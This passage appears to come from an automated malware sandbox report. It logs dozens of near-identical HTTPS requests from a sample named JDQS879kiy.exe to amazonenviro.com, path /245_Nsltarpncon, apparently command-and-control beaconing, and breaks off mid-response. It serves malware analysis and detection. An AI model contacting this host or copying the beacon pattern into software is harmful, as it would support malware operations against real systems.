                      2025-01-14 07:24:38 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:39 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:38 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      13192.168.2.749897166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:40 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:40 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:40 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      14192.168.2.749909166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:41 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:42 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:42 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      15192.168.2.749921166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:43 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:44 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:43 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      16192.168.2.749933166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:45 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:46 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:46 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      17192.168.2.749945166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:47 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:47 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:47 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      18192.168.2.749957166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:48 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:49 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:49 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      19192.168.2.749969166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:50 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:51 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:51 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      20192.168.2.749981166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:52 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:52 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:52 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      21192.168.2.749994166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:53 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:54 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:54 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      22192.168.2.750005166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:55 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:56 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:56 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      23192.168.2.750017166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:57 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:57 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:57 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      24192.168.2.750022166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:24:58 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:24:59 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:24:59 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      25192.168.2.750024166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:00 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:01 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:00 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      26192.168.2.750026166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:02 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:02 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:02 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      27192.168.2.750028166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:03 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:04 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:04 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      28192.168.2.750030166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:05 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:06 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:05 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      29192.168.2.750032166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:07 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:07 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:07 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      30192.168.2.750034166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:08 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:09 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:09 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      31192.168.2.750037166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:10 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:10 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:10 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      32192.168.2.750039166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:11 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:12 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:12 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      33192.168.2.750041166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:13 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:14 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:13 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      34192.168.2.750043166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:15 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:15 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:15 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      35192.168.2.750045166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:16 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:17 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:17 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      36192.168.2.750047166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:18 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:18 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:18 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      37192.168.2.750049166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:20 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:20 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:20 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      38192.168.2.750051166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:21 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:22 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:22 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      39192.168.2.750053166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:23 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:23 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:23 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      40192.168.2.750055166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:24 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:25 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:25 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      41192.168.2.750057166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:26 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:27 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:26 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      42192.168.2.750059166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:28 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:28 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:28 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      43192.168.2.750061166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:29 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:30 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:30 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      44192.168.2.750063166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:31 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:31 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:31 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      45192.168.2.750065166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:32 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:33 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:33 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      46192.168.2.750067166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:34 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:35 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:34 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      47192.168.2.750069166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:36 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:36 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:36 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      48192.168.2.750071166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:37 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:38 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:38 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      49192.168.2.750073166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:39 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:39 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:39 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
                      Upgrade: h2,h2c
                      Connection: Upgrade, close
                      Vary: Accept-Encoding
                      Content-Length: 0
                      Content-Type: text/html; charset=UTF-8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      50192.168.2.750075166.62.27.1884437852C:\Users\user\Desktop\JDQS879kiy.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 07:25:41 UTC165OUTGET /245_Nsltarpncon HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                      Host: amazonenviro.com
                      2025-01-14 07:25:41 UTC225INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 07:25:41 GMT
                      Server: Apache
                      X-Powered-By: PHP/7.3.33
